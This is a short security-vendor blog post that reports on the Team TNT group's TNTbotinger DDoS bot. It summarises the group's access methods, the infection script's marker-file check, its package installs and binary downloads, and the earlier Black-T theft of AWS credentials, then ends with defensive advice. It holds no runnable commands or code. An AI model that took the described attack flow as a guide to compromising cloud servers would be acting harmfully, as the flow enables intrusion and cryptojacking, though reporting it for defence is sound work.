The criminal outfit known for its cryptomining operations, Team TNT has enhanced its arsenal with new tools with sharpened capabilities. It has been observed that a new bot named TNTbotinger has been used by the threat group in their recent attack.
The threat group has developed its own Internet Relay Chat (IRC) bot called TNTbotinger which can be used to perform DDoS attacks.
- To perform an attack using the TNTbotinger, the attackers must perform remote code execution on their initial target machine via misconfiguration issues, reused or weak passwords, leaked credentials, and unpatched vulnerabilities.
- It looks for vulnerable instances on the network and performs remote code execution once it is inside.
How does the attack work?
- The attack commences by utilizing a malicious shell script that executes on a victim machine. The shell script scans for the /dev/shm/[.]alsp file presence. Given the absence of the file, it starts doing its job.
- Later, the script will attempt to install curl, bash, wget, gcc, make, and pnscan packages. These packages are intended to support both Linux and Debian and hence they are implemented.
- The script tries to download and execute multiple binaries, such as pnscan, a tool for port scanning. If the tool is not part of the directory, it can be downloaded manually.
Recent wave of attacks –
- The threat group TNT Trojan that targets cloud servers for mining cryptocurrency via third-party software was recently updated.
- Earlier, in order to target AWS credential files for mining Monero cryptocurrency, the group was using a malware named Black-T.
The threat actor group has displayed how vulnerable even the state-of-the-art cloud services are to malicious threat actors with the threats in their arsenal. In order to defend from such threats, our internal experts suggest proactively implementing policies for continuous monitoring and auditing of devices, following the principle of least privilege, regularly patching and updating systems, and using strong passwords.
To read more, please check eScan Blog
